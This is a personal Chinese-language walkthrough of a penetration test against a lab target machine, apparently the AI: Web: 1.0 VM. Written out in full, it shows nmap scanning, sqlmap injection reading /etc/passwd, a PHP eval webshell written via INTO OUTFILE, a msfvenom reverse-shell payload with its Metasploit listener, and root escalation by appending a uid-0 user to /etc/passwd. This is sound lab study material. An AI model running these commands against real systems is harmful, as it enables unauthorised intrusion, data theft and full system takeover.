(1)扫描靶机ip
namp -sP ip/24
找出靶机ip
(2)拿到靶机ip扫描存活端口
nmap -sS -sV -T4 -A -p- ip
-sS(使用SYN进行扫描)
-sV(探测开启的端口来获取服务、版本信息)
-T4(数字越大,nmap扫描速度越快)
-A(一次扫描包含系统探测、版本探测、脚本扫描和跟踪扫描)、
(3)用drib或者dirsearch目录爆破
寻找①网站文件路径②敏感目录文件
(4)访问文件路径,看看网站的服务是什么,如果是数据库查询可以利用sqlmap注入
(5)bp抓包,保存文件(命名为uid.txt),利用slqmap扫描
sqlmap -r uid.txt --dbs(后续-D -T -C查看详细信息)
突破点:
①sqlmap -r uid.txt --file-read="/etc/passwd"(尝试读取passwd信息)
②sqlmap -r uid.txt --sql-shell
sql-shell> select @@datadir(获取数据库保存数据的位置)
③再次尝试读取/etc/passwd
sql-shell>
select load_file('/etc/passwd')
(6)php网站,可以寻找phpinfo文件的位置(存在网站物理路径)
存在文件上传的网站可能有写入权限
(7)在mysql写入webshell
①into outfile写入
sqlmap -r uid.txt --sql-query='select "<?php @eval($_POST[cmd]); ?>" INTO OUTFILE "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php"'
②--file-dest写入
先用msfvenom生成木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=1234 R > shell.php
生成的木马记得打开删除前面的两个字符/*
(如果远程存在该文件,则无法写入。)
使用msfvenom接收反弹shell
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 1234
run
最后访问http://靶机IP/se3reTdir777/uploads/webshell.php进行shell反弹。
跳出meterpreter>?????? 输入shell即可
接下来涉及linux提权,暂时没有学习,以后记录
随笔:
>perl -le ‘print "hello world"'
hello world
需要学习:
①收集靶机内核版本uname -a
searchsploit linux 4.15
②SUID提权
③添加用户名密码到/etc/passwd
www-data用户具有/etc/passwd的可写权限。添加一个用户到/etc/passwd文件中
perl -le 'print crypt("Ai:Web:1.0","salt")'
echo "ins1ght:saPxWonD/gnR6:0:0:hacker:/root:/bin/bash" >> /etc/passwd
cat /etc/passwd | grep ins1ght
ins1ght
使用su ins1ght切换账户,密码是Ai:Web:1.0
?
|